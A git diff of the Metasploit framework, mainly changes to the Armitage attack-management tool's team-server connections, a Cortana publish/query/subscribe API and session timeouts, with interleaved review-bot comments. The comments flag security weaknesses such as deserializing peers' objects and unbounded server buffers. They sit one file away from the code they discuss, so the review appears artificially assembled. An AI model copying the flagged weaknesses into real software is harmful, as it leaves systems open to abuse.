diff --git a/.yardopts b/.yardopts new file mode 100644 index 0000000000..bb3a0e391f --- /dev/null +++ b/.yardopts @@ -0,0 +1,7 @@ +--protected +--exclude samples/ +--exclude \.ut\.rb/ +--exclude \.ts\.rb/ +--files CONTRIBUTING.md,COPYING,HACKING,LICENSE +lib/msf/**/*.rb +lib/rex/**/*.rb diff --git a/Gemfile b/Gemfile index 251808c2a5..bc0027d234 100755 --- a/Gemfile +++ b/Gemfile @@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.6.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.6.2' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler diff --git a/Gemfile.lock b/Gemfile.lock index c16a1cca2f..af2598e887 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 0285d6e199f125b33214100dcb0f4eeb12ee765f - tag: 0.6.0 + revision: 67d78f9ce59a74ad9d6e8d3f9e68760ff4d2ec55 + tag: 0.6.2 specs: - metasploit_data_models (0.6.0) + metasploit_data_models (0.6.2) activerecord (>= 3.2.10) activesupport pg diff --git a/Rakefile b/Rakefile index d32e9352cb..c44736e0d3 100644 --- a/Rakefile +++ b/Rakefile 
@@ -1,52 +1,49 @@ require 'bundler/setup' -require 'rspec/core/rake_task' -require 'yard' +require 'metasploit_data_models' -RSpec::Core::RakeTask.new(:spec) +print_without = false -task :default => :spec +begin + require 'rspec/core/rake_task' +rescue LoadError + puts "rspec not in bundle, so can't set up spec tasks. " \ + "To run specs ensure to install the development and test groups." -namespace :yard do - yard_files = [ - # Ruby source files first - 'lib/msf/**/*.rb', - 'lib/rex/**/*.rb', - # Anything after '-' is a normal documentation, not source - '-', - 'COPYING', - 'HACKING', - 'LICENSE', - 'CONTRIBUTING.md', - ] - yard_options = [ - # include documentation for protected methods for developers extending the code. - '--protected', - # Don't bother with files meant to be examples - '--exclude', 'samples/', - '--exclude', '\.ut\.rb/', - '--exclude', '\.ts\.rb/', - ] + print_without = true +else + RSpec::Core::RakeTask.new(:spec) - YARD::Rake::YardocTask.new(:doc) do |t| - t.files = yard_files - # --no-stats here as 'stats' task called after will print fuller stats - t.options = yard_options + ['--no-stats'] - - t.after = Proc.new { - Rake::Task['yard:stats'].execute - } - end - - desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods" - task :stats => :environment do - stats = YARD::CLI::Stats.new - yard_arguments = yard_options + ['--compact', '--list-undoc'] + yard_files - stats.run(*yard_arguments) - end + task :default => :spec end -# @todo Figure out how to just clone description from yard:doc -desc "Generate YARD documentation" -# allow calling namespace to as a task that goes to default task for namespace -task :yard => ['yard:doc'] +begin + require 'yard' +rescue LoadError + puts "yard not in bundle, so can't set up yard tasks. " \ + "To generate documentation ensure to install the development group." 
+ + print_without = true +end + +metasploit_data_models_task_glob = MetasploitDataModels.root.join( + 'lib', + 'tasks', + '**', + '*.rake' +).to_s + +# include tasks from metasplioit_data_models, such as `rake yard`. +# metasploit-framework specific yard options are in .yardopts +Dir.glob(metasploit_data_models_task_glob) do |path| + load path +end + +if print_without + puts "Bundle currently installed " \ + "'--without #{Bundler.settings.without.join(' ')}'." + puts "To clear the without option do `bundle install --without ''` " \ + "(the --without flag with an empty string) or " \ + "`rm -rf .bundle` to remove the .bundle/config manually and " \ + "then `bundle install`" +end diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 81c949a109..143b587e24 100755 Binary files a/data/armitage/armitage.jar and b/data/armitage/armitage.jar differ diff --git a/data/armitage/cortana.jar b/data/armitage/cortana.jar index 7c1da6dbfa..8035ff663c 100644 Binary files a/data/armitage/cortana.jar and b/data/armitage/cortana.jar differ diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt index 55804871ff..01a4364bfc 100755 --- a/data/armitage/whatsnew.txt +++ b/data/armitage/whatsnew.txt 
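Review bot: The `Dir.glob(metasploit_data_models_task_glob) do |path| load path end` loop runs even after the `require 'yard'` guard above it has rescued a LoadError, so the guard only prints a message and does not keep the gem's yard task file from being loaded. The 0.6.0 copy of `lib/tasks/yard.rake` removed elsewhere in this commit calls `require 'yard'` at the top of the file; if the 0.6.2 copy does the same (it is not visible here), `rake` will still abort on a bundle installed without the development group. Consider wrapping the load, e.g. `begin; load path; rescue LoadError => e; puts "skipping #{path}: #{e.message}"; end`. The loop also executes every `*.rake` file shipped in the gem when the Rakefile is read, and the Gemfile fetches that gem over unauthenticated `git://`, so the `revision:` pin in Gemfile.lock is what protects this path and deserves a comment next to the loop. The comment above the loop misspells the gem name as `metasplioit_data_models`.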
@@ -1,6 +1,35 @@ Armitage Changelog ================== +6 Mar 13 (tested against msf ca43900a7) +-------- +- Active console now gets higher priority when polling msf for output +- Improved team server responsiveness in high latency situations by + creating additional connections to server to balance messages over +- Preferences are now shared among each Armitage connection. + +6 Mar 13 (2000h) +-------- +- Fixed issue with additional team server connections reporting wrong + application and receiving a summary rejection by the team server. + +Cortana Updates (for scripters) +-------- +- Added a &publish, &query, &subscribe API to allow inter-script + communication across the team server. +- Added &table_update to set the contents of a table tab without + disturbing the highlighted rows. +- Added an exec_error event. Fired when &m_exec or &m_exec_local fail + due to an error reported by meterpreter. +- Fixed a bug that sometimes caused session_sync to fire twice (boo!) +- Added a 60s timeout to &s_cmd commands. Cortana will give a shell + command 60s to execute. If it doesn't finish in that time, Cortana + will release the lock on the shell so the user can control it. + (ideally, this shouldn't happen... this is a safety mechanism) +- Changed Meterpreter command timeout to 2m from 12s. This is because + https meterpreter might not checkin for up to 60s, if it's been + idle for a long time. This will make &m_cmd less likely to timeout + 12 Feb 13 (tested against msf 16438) --------- - Fixed a corner case preventing the display of removed host labels diff --git a/documentation/Gemfile b/documentation/Gemfile deleted file mode 100755 index 7d6c690027..0000000000 --- a/documentation/Gemfile +++ /dev/null 
@@ -1,12 +0,0 @@
-source 'http://rubygems.org'
-gem 'rails', '3.2.2'
-gem 'authlogic'
-gem 'prototype_legacy_helper', '0.0.0', :git => 'git://github.com/jvennix-r7/prototype_legacy_helper.git'
-gem 'state_machine', '1.1.2'
-gem 'liquid', '2.3.0'
-gem 'ice_cube'
-gem 'acts_as_list'
-gem 'mime-types', '1.18', :git => "git://github.com/rapid7/mime-types.git"
-gem 'metasploit_data_models', '0.0.2', :git => "git://github.com/rapid7/metasploit_data_models.git"
-gem 'robots', '0.10.1'
-
diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html
index 1167b175f4..4c44f1ed61 100644
--- a/external/source/armitage/resources/about.html
+++ b/external/source/armitage/resources/about.html
@@ -3,7 +3,7 @@

Armitage 1.45

An attack management tool for Metasploit® -
Release: 12 Feb 13

+
Release: 6 Mar 13


Developed by:

diff --git a/external/source/armitage/scripts-cortana/internal-ui.sl b/external/source/armitage/scripts-cortana/internal-ui.sl index 498646fe41..ae479f22f1 100644 --- a/external/source/armitage/scripts-cortana/internal-ui.sl +++ b/external/source/armitage/scripts-cortana/internal-ui.sl @@ -188,13 +188,24 @@ sub table_selected_single { # table_set($table, @rows) sub table_set { - local('$model $row'); - $model = [$1 getModel]; - [$model clear: size($2) * 2]; - foreach $row ($2) { - [$model addEntry: $row]; - } - [$model fireListeners]; + later(lambda({ + local('$model $row'); + $model = [$a getModel]; + [$model clear: size($b) * 2]; + foreach $row ($b) { + [$model addEntry: $row]; + } + [$model fireListeners]; + }, $a => $1, $b => $2)); +} + +# table_set($table, @rows) +sub table_update { + later(lambda({ + [$a markSelections]; + table_set($a, $b); + [$a restoreSelections]; + }, $a => $1, $b => $2)); } # table_sorter($table, index, &function); diff --git a/external/source/armitage/scripts-cortana/internal.sl b/external/source/armitage/scripts-cortana/internal.sl index 5ab90d7235..a3081bf304 100644 --- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl 
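Review bot: The comment above the new `table_update` still reads `# table_set($table, @rows)`, copied from the function before it, so the two look identical in the docs. I would change it to `# table_update($table, @rows) - replace the rows but keep the current selection`. It is also worth a line noting that `table_update` calls `table_set` from inside its own `later` closure, so `[$a restoreSelections]` only sees the new rows if the inner `later` runs immediately; that appears to rely on the `&later` change in UIBridge.java in this same commit.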
@@ -583,6 +583,39 @@ sub data_add { call("db.key_add", $1, $data); } +# +# a publish/query/subscribe API +# + +# publish("key", $object) +sub publish { + local('$data'); + $data = [msf.Base64 encode: cast(pack("o", $2, 1), 'b')]; + call_async("armitage.publish", $1, "$data $+ \n"); +} + +# query("key", "index") +sub query { + local('$r @r $result'); + $r = call("armitage.query", $1, $2)['data']; + if ($r ne "") { + foreach $result (split("\n", $r)) { + push(@r, unpack("o", [msf.Base64 decode: $result])[0]); + } + } + return @r; +} + +# subscribe("key", "index", "1s/5s/10s/15s/30s/1m/5m/10m/15m/20m/30m/60m") +sub subscribe { + on("heartbeat_ $+ $3", lambda({ + local('$result'); + foreach $result (query($key, $index)) { + fire_event_local($key, $result, $index); + } + }, $key => $1, $index => $2)); +} + # # Shell shock? # @@ -834,7 +867,7 @@ sub m_exec { }, \$command, \$channel, \$buffer)); } else { - # this is probably ok... + fire_event_local("exec_error", $1, $command, ["$3" trim]); } }, \$command)); } diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index 427e1c4a82..2df5fcf2a4 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -15,7 +15,7 @@ import graph.*; import java.awt.image.*; -global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME'); +global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME @POOL'); sub describeHost { local('$desc'); 
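Review bot: `query` passes every line returned by `armitage.query` through `unpack("o", ...)`, and those lines are whatever any client connected to the team server sent with `publish`. If Sleep's `o` format is backed by Java object serialization, as I understand it to be, each subscriber is deserializing objects chosen by its peers, and the result goes straight into `fire_event_local` in `subscribe`. I would document that trust assumption above `query`, for example `# NOTE: values are deserialized objects from other team members; only use on a trusted team server`, and consider limiting published values to plain strings or checking the unpacked type before firing the event. `query` also has no handling for a line that fails to decode, so one malformed entry under a key would presumably break every reader of that key.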
@@ -164,13 +164,14 @@ sub _connectToMetasploit { $client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug]; $aclient = [new RpcAsync: $client]; $mclient = $client; + push(@POOL, $aclient); initConsolePool(); $DESCRIBE = "localhost"; } # we have a team server... connect and authenticate to it. else { + [$progress setNote: "Connected: logging in"]; $client = c_client($1, $2); - setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L); $mclient = setup_collaboration($3, $4, $1, $2); $aclient = $mclient; @@ -178,6 +179,17 @@ sub _connectToMetasploit { [$progress close]; return; } + else { + [$progress setNote: "Connected: authenticated"]; + } + + # create six additional connections to team server... for balancing consoles. + local('$x $cc'); + for ($x = 0; $x < 6; $x++) { + $cc = c_client($1, $2); + call($cc, "armitage.validate", $3, $4, $null, "armitage", 120326); + push(@POOL, $cc); + } } $flag = $null; } diff --git a/external/source/armitage/scripts/preferences.sl b/external/source/armitage/scripts/preferences.sl index 19ad929524..ec418f2c19 100644 --- a/external/source/armitage/scripts/preferences.sl +++ b/external/source/armitage/scripts/preferences.sl @@ -57,12 +57,21 @@ sub parseYaml { sub loadPreferences { local('$file $prefs'); $file = getFileProper(systemProperties()["user.home"], ".armitage.prop"); - $prefs = [new Properties]; - if (-exists $file) { - [$prefs load: [new java.io.FileInputStream: $file]]; + if ($__frame__ !is $null && [$__frame__ getPreferences] !is $null) { + $prefs = [$__frame__ getPreferences]; } else { - [$prefs load: resource("resources/armitage.prop")]; + $prefs = [new Properties]; + if (-exists $file) { + [$prefs load: [new java.io.FileInputStream: $file]]; + } + else { + [$prefs load: resource("resources/armitage.prop")]; + } + + if ($__frame__ !is $null) { + [$__frame__ setPreferences: $prefs]; + } } # parse command line options here. 
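Review bot: In the loop that opens the six extra team-server connections, the result of `call($cc, "armitage.validate", $3, $4, $null, "armitage", 120326)` is discarded and `$cc` is pushed onto `@POOL` whether or not the server accepted it. The primary connection is checked after `setup_collaboration` (the branch that closes `$progress` and returns), so the pooled ones should get the same treatment; otherwise `rand(@POOL)` in shell.sl and util.sl can hand a console a rejected or dead connection. Keep the return value and only `push(@POOL, $cc)` when it reports success, using the same success test as `setup_collaboration`, which is outside this hunk. The literal `120326` and the count `6` would also read better as named values with a comment saying what the server compares them against.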
diff --git a/external/source/armitage/scripts/shell.sl b/external/source/armitage/scripts/shell.sl index 7af64f264e..43abea73c3 100644 --- a/external/source/armitage/scripts/shell.sl +++ b/external/source/armitage/scripts/shell.sl @@ -290,7 +290,7 @@ sub createShellSessionTab { return; } - $thread = [new ConsoleClient: $console, $client, "session.shell_read", "session.shell_write", $null, $sid, 0]; + $thread = [new ConsoleClient: $console, rand(@POOL), "session.shell_read", "session.shell_write", $null, $sid, 0]; [$frame addTab: "Shell $sid", $console, lambda({ call_async($mclient, "armitage.unlock", $sid); [$thread kill]; diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index b226c1edc2..8bc953b989 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -78,7 +78,7 @@ sub setupEventStyle { sub createDisplayTab { local('$console $host $queue $file'); - $queue = [new ConsoleQueue: $client]; + $queue = [new ConsoleQueue: rand(@POOL)]; if ($1 eq "Log Keystrokes") { $console = [new ActivityConsole: $preferences]; } @@ -100,7 +100,7 @@ sub createConsolePanel { setupConsoleStyle($console); $result = call($client, "console.create"); - $thread = [new ConsoleClient: $console, $aclient, "console.read", "console.write", "console.destroy", $result['id'], $1]; + $thread = [new ConsoleClient: $console, rand(@POOL), "console.read", "console.write", "console.destroy", $result['id'], $1]; [$thread setMetasploitConsole]; [$thread setSessionListener: { diff --git a/external/source/armitage/src/armitage/ConsoleClient.java b/external/source/armitage/src/armitage/ConsoleClient.java index 7937362f1a..82a8b05fd2 100644 --- a/external/source/armitage/src/armitage/ConsoleClient.java +++ b/external/source/armitage/src/armitage/ConsoleClient.java 
@@ -215,6 +215,7 @@ public class ConsoleClient implements Runnable, ActionListener { Map read; boolean shouldRead = go_read; String command = null; + long last = 0; try { while (shouldRead) { @@ -230,21 +231,23 @@ public class ConsoleClient implements Runnable, ActionListener { lastRead = System.currentTimeMillis(); } - read = readResponse(); - - if (read == null || "failure".equals( read.get("result") + "" )) { - break; - } - - processRead(read); - - if ((System.currentTimeMillis() - lastRead) <= 500) { - Thread.sleep(10); + long now = System.currentTimeMillis(); + if (this.window != null && !this.window.isShowing() && (now - last) < 1500) { + /* check if our window is not showing... if not, then we're going to switch to a very reduced + read schedule. */ } else { - Thread.sleep(500); + read = readResponse(); + if (read == null || "failure".equals( read.get("result") + "" )) { + break; + } + + processRead(read); + last = System.currentTimeMillis(); } + Thread.sleep(100); + synchronized (listeners) { shouldRead = go_read; } diff --git a/external/source/armitage/src/cortana/data/Sessions.java b/external/source/armitage/src/cortana/data/Sessions.java index cedac86993..6b4da2455d 100644 --- a/external/source/armitage/src/cortana/data/Sessions.java +++ b/external/source/armitage/src/cortana/data/Sessions.java @@ -130,6 +130,10 @@ public class Sessions extends ManagedData { } } + /* calculate the differences and fire some events based on them */ + Set newSessions = DataUtils.difference(after, before); + fireSessionEvents("session_open", newSessions.iterator(), dataz); + /* calculate sync events and fix the nonsync set */ Set newsync = DataUtils.intersection(syncz, nonsync); fireSessionEvents("session_sync", newsync.iterator(), dataz); 
@@ -137,11 +141,9 @@ public class Sessions extends ManagedData { /* update our list of non-synced sessions */ nonsync.removeAll(syncz); - /* calculate the differences and fire some events based on them */ - Set newSessions = DataUtils.difference(after, before); - fireSessionEvents("session_open", newSessions.iterator(), dataz); - - newSessions.retainAll(syncz); + /* these are sessions that are new and sync'd -- fire events for them... */ + newSessions.removeAll(newsync); /* we already fired events for these */ + newSessions.retainAll(syncz); /* keep anything that is synced */ fireSessionEvents("session_sync", newSessions.iterator(), dataz); Set droppedSessions = DataUtils.difference(before, after); diff --git a/external/source/armitage/src/cortana/gui/UIBridge.java b/external/source/armitage/src/cortana/gui/UIBridge.java index d4def58a71..42fe117687 100644 --- a/external/source/armitage/src/cortana/gui/UIBridge.java +++ b/external/source/armitage/src/cortana/gui/UIBridge.java @@ -30,11 +30,16 @@ public class UIBridge implements Loadable, Function { if (name.equals("&later")) { final SleepClosure f = BridgeUtilities.getFunction(args, script); final Stack argz = EventManager.shallowCopy(args); - SwingUtilities.invokeLater(new Runnable() { - public void run() { - SleepUtils.runCode(f, "laterz", null, argz); - } - }); + if (SwingUtilities.isEventDispatchThread()) { + SleepUtils.runCode(f, "laterz", null, argz); + } + else { + SwingUtilities.invokeLater(new Runnable() { + public void run() { + SleepUtils.runCode(f, "laterz", null, argz); + } + }); + } } return SleepUtils.getEmptyScalar(); diff --git a/external/source/armitage/src/cortana/metasploit/ShellSession.java b/external/source/armitage/src/cortana/metasploit/ShellSession.java index f79f752511..4f3207680d 100644 --- a/external/source/armitage/src/cortana/metasploit/ShellSession.java +++ b/external/source/armitage/src/cortana/metasploit/ShellSession.java 
@@ -75,7 +75,8 @@ public class ShellSession implements Runnable { /* loop forever waiting for response to come back. If session is dead then this loop will break with an exception */ - while (true) { + long start = System.currentTimeMillis(); + while ((System.currentTimeMillis() - start) < 60000) { response = readResponse(); String data = (response.get("data") + ""); @@ -95,6 +96,7 @@ public class ShellSession implements Runnable { Thread.sleep(100); } + System.err.println(session + " -> " + c.text + " (took longer than anticipated, dropping: " + (System.currentTimeMillis() - start) + ")"); } catch (Exception ex) { System.err.println(session + " -> " + c.text + " ( " + response + ")"); diff --git a/external/source/armitage/src/msf/MeterpreterSession.java b/external/source/armitage/src/msf/MeterpreterSession.java index 2f42fc09d9..fb91d6ab9e 100644 --- a/external/source/armitage/src/msf/MeterpreterSession.java +++ b/external/source/armitage/src/msf/MeterpreterSession.java @@ -14,7 +14,7 @@ public class MeterpreterSession implements Runnable { protected String session; protected boolean teammode; - public static long DEFAULT_WAIT = 12000; + public static long DEFAULT_WAIT = 120000; private static class Command { public Object token; diff --git a/external/source/armitage/src/msf/RpcConnectionImpl.java b/external/source/armitage/src/msf/RpcConnectionImpl.java index d784ab17b7..426cb079ae 100644 --- a/external/source/armitage/src/msf/RpcConnectionImpl.java +++ b/external/source/armitage/src/msf/RpcConnectionImpl.java @@ -10,6 +10,7 @@ import javax.xml.transform.*; import javax.xml.transform.dom.*; import javax.xml.transform.stream.*; import org.w3c.dom.*; +import armitage.ArmitageBuffer; /** * This is a modification of msfgui/RpcConnection.java by scriptjunkie. Taken from 
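Review bot: When the new 60 second limit on the read loop expires, the command is dropped but whatever it eventually prints is still queued on the session, so the next command's loop may read that late output as its own response. Nothing in the visible lines drains or marks the stream after the timeout; if that happens outside the hunk, a comment saying so would help. The `System.err.println` after the loop also appears to be reached on every exit from the `while`, so it is only correct if the success path leaves by `return` rather than `break` (the loop body is not shown here). I would pull `60000` into a named constant, e.g. `private static final long COMMAND_TIMEOUT_MS = 60000;`, since the changelog documents it as a user-visible limit.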
@@ -85,6 +86,22 @@ public abstract class RpcConnectionImpl implements RpcConnection, Async { protected HashMap locks = new HashMap(); protected String address = ""; + protected HashMap buffers = new HashMap(); + + /* help implement our remote buffer API for PQS primitives */ + public ArmitageBuffer getABuffer(String key) { + synchronized (buffers) { + ArmitageBuffer buffer; + if (buffers.containsKey(key)) { + buffer = (ArmitageBuffer)buffers.get(key); + } + else { + buffer = new ArmitageBuffer(16384); + buffers.put(key, buffer); + } + return buffer; + } + } public String getLocalAddress() { return address; @@ -133,6 +150,23 @@ public abstract class RpcConnectionImpl implements RpcConnection, Async { locks.remove(params[0] + ""); return new HashMap(); } + else if (methodName.equals("armitage.publish")) { + ArmitageBuffer buffer = getABuffer(params[0] + ""); + buffer.put(params[1] + ""); + return new HashMap(); + } + else if (methodName.equals("armitage.query")) { + ArmitageBuffer buffer = getABuffer(params[0] + ""); + String data = (String)buffer.get(params[1] + ""); + HashMap temp = new HashMap(); + temp.put("data", data); + return temp; + } + else if (methodName.equals("armitage.reset")) { + ArmitageBuffer buffer = getABuffer(params[0] + ""); + buffer.reset(); + return new HashMap(); + } else if (hooks.containsKey(methodName)) { RpcConnection con = (RpcConnection)hooks.get(methodName); return con.execute(methodName, params); diff --git a/external/source/armitage/src/ui/ATable.java b/external/source/armitage/src/ui/ATable.java index ce80216dbd..6b9eb9b140 100644 --- a/external/source/armitage/src/ui/ATable.java +++ b/external/source/armitage/src/ui/ATable.java 
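Review bot: `getABuffer` creates and stores a `new ArmitageBuffer(16384)` for every key it has not seen, and `armitage.publish`, `armitage.query` and `armitage.reset` all reach it with a caller-supplied `params[0]`, so any client that can call these methods can grow `buffers` without limit, even with read-only queries for keys nobody published. Nothing in the hunk removes an entry. I would make `query` and `reset` look the key up without creating it (returning an empty `data` when absent) and cap the number of keys on the publish path. `params[0]` and `params[1]` are also indexed without a length check, so a short call presumably ends in an `ArrayIndexOutOfBoundsException` rather than a clean error; a guard such as `if (params.length < 2) return new HashMap();` at the top of the `armitage.query` branch would cover it.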
@@ -10,8 +10,48 @@ import table.*; import java.util.*; public class ATable extends JTable { + public static final String indicator = " \u271A"; + protected boolean alternateBackground = false; + protected int[] selected = null; + + /* call this function to store selections */ + public void markSelections() { + selected = getSelectedRows(); + } + + public void fixSelection() { + if (selected.length == 0) + return; + + getSelectionModel().setValueIsAdjusting(true); + + int rowcount = getModel().getRowCount(); + + for (int x = 0; x < selected.length; x++) { + if (selected[x] < rowcount) { + getSelectionModel().addSelectionInterval(selected[x], selected[x]); + } + } + + getSelectionModel().setValueIsAdjusting(false); + } + + /* call this function to restore selections after a table update */ + public void restoreSelections() { + if (!SwingUtilities.isEventDispatchThread()) { + SwingUtilities.invokeLater(new Runnable() { + public void run() { + fixSelection(); + } + }); + } + else { + fixSelection(); + } + } + public static TableCellRenderer getDefaultTableRenderer(final JTable table, final TableModel model) { final Set specialitems = new HashSet(); specialitems.add("Wordlist"); @@ -39,7 +79,7 @@ public class ATable extends JTable { String content = (value != null ? value : "") + ""; if (specialitems.contains(content) || content.indexOf("FILE")!= -1) { - content = content + " \u271A"; + content = content + indicator; } JComponent c = (JComponent)render.getTableCellRendererComponent(table, content, isSelected, false, row, column); 
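Review bot: `fixSelection()` reads `selected.length`, but `selected` starts as `null` and is only assigned in `markSelections()`, so calling `restoreSelections()` (or the public `fixSelection()`) first throws a NullPointerException, on the EDT in the `invokeLater` path. Change the guard to `if (selected == null || selected.length == 0) return;`. Note also that the saved values are row indices, so after an update that reorders or shortens the table the same positions are re-selected rather than the same entries; if that is intended, say so in the comment on `markSelections()`.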
@@ -117,6 +157,47 @@ public class ATable extends JTable { }; } + public static TableCellRenderer getTimeTableRenderer() { + return new TableCellRenderer() { + public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { + TableCellRenderer render = table.getDefaultRenderer(String.class); + + JComponent c = (JComponent)render.getTableCellRendererComponent(table, "", isSelected, false, row, column); + + try { + long size = Long.parseLong(value + ""); + String units = "ms"; + + if (size > 1000) { + size = size / 1000; + units = "s"; + } + else { + ((JLabel)c).setText(size + units); + return c; + } + + if (size > 60) { + size = size / 60; + units = "m"; + } + + if (size > 60) { + size = size / 60; + units = "h"; + } + + ((JLabel)c).setText(size + units); + } + catch (Exception ex) { + + } + + return c; + } + }; + } + public void adjust() { setShowGrid(false); setIntercellSpacing(new Dimension(0, 0)); diff --git a/external/source/armitage/src/ui/MultiFrame.java b/external/source/armitage/src/ui/MultiFrame.java index 96bea014f1..ba994e940e 100644 --- a/external/source/armitage/src/ui/MultiFrame.java +++ b/external/source/armitage/src/ui/MultiFrame.java @@ -17,6 +17,7 @@ public class MultiFrame extends JFrame implements KeyEventDispatcher { protected JPanel content; protected CardLayout cards; protected LinkedList buttons; + protected Properties prefs; private static class ArmitageInstance { public ArmitageApplication app; @@ -24,6 +25,14 @@ public class MultiFrame extends JFrame implements KeyEventDispatcher { public RpcConnection client; } + public void setPreferences(Properties prefs) { + this.prefs = prefs; + } + + public Properties getPreferences() { + return prefs; + } + public Map getClients() { synchronized (buttons) { Map r = new HashMap(); diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index 55804871ff..01a4364bfc 100644 
--- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,35 @@ Armitage Changelog ================== +6 Mar 13 (tested against msf ca43900a7) +-------- +- Active console now gets higher priority when polling msf for output +- Improved team server responsiveness in high latency situations by + creating additional connections to server to balance messages over +- Preferences are now shared among each Armitage connection. + +6 Mar 13 (2000h) +-------- +- Fixed issue with additional team server connections reporting wrong + application and receiving a summary rejection by the team server. + +Cortana Updates (for scripters) +-------- +- Added a &publish, &query, &subscribe API to allow inter-script + communication across the team server. +- Added &table_update to set the contents of a table tab without + disturbing the highlighted rows. +- Added an exec_error event. Fired when &m_exec or &m_exec_local fail + due to an error reported by meterpreter. +- Fixed a bug that sometimes caused session_sync to fire twice (boo!) +- Added a 60s timeout to &s_cmd commands. Cortana will give a shell + command 60s to execute. If it doesn't finish in that time, Cortana + will release the lock on the shell so the user can control it. + (ideally, this shouldn't happen... this is a safety mechanism) +- Changed Meterpreter command timeout to 2m from 12s. This is because + https meterpreter might not checkin for up to 60s, if it's been + idle for a long time. This will make &m_cmd less likely to timeout + 12 Feb 13 (tested against msf 16438) --------- - Fixed a corner case preventing the display of removed host labels diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile deleted file mode 100755 index 8fd6dc482f..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile +++ /dev/null 
@@ -1,34 +0,0 @@
-#!/usr/bin/env rake
-begin
- require 'bundler/setup'
-rescue LoadError
- puts 'You must `gem install bundler` and `bundle install` to run rake tasks'
-end
-
-APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__)
-load 'rails/tasks/engine.rake'
-
-Bundler::GemHelper.install_tasks
-
-#
-# load rake files like a normal rails app
-# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl
-#
-
-pathname = Pathname.new(__FILE__)
-root = pathname.parent
-rakefile_glob = root.join('lib', 'tasks', '**', '*.rake').to_path
-
-Dir.glob(rakefile_glob) do |rakefile|
- load rakefile
-end
-
-require 'rspec/core'
-require 'rspec/core/rake_task'
-
-# Depend on app:db:test:prepare so that test database is recreated just like in a full rails app
-# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl
-RSpec::Core::RakeTask.new(:spec => 'app:db:test:prepare')
-
-task :default => :spec
-
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb
deleted file mode 100644
index 4f73f5c985..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb
+++ /dev/null
@@ -1,14 +0,0 @@
-require 'rails'
-
-module MetasploitDataModels
- class Engine < Rails::Engine
-
- # @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl
- config.generators do |g|
- g.assets false
- g.fixture_replacement :factory_girl, :dir => 'spec/factories'
- g.helper false
- g.test_framework :rspec, :fixture => false
- end
- end
-end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake
deleted file mode 100644
index cc279684e7..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake
+++ /dev/null
@@ -1,27 +0,0 @@
-# @note All options not specific to any given rake task should go in the .yardopts file so they are available to both
-# the below rake tasks and when invoking `yard` from the command line
-
-require 'yard'
-require 'yard/rake/yardoc_task'
-
-namespace :yard do
- YARD::Rake::YardocTask.new(:doc) do |t|
- # --no-stats here as 'stats' task called after will print fuller stats
- t.options = ['--no-stats']
-
- t.after = Proc.new {
- Rake::Task['yard:stats'].execute
- }
- end
-
- desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods"
- task :stats => :environment do
- stats = YARD::CLI::Stats.new
- stats.run('--compact', '--list-undoc')
- end
-end
-
-# @todo Figure out how to just clone description from yard:doc
-desc "Generate YARD documentation"
-# allow calling namespace to as a task that goes to default task for namespace
-task :yard => ['yard:doc']
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.gitignore
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.gitignore
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.gitignore
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.rspec
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.rspec
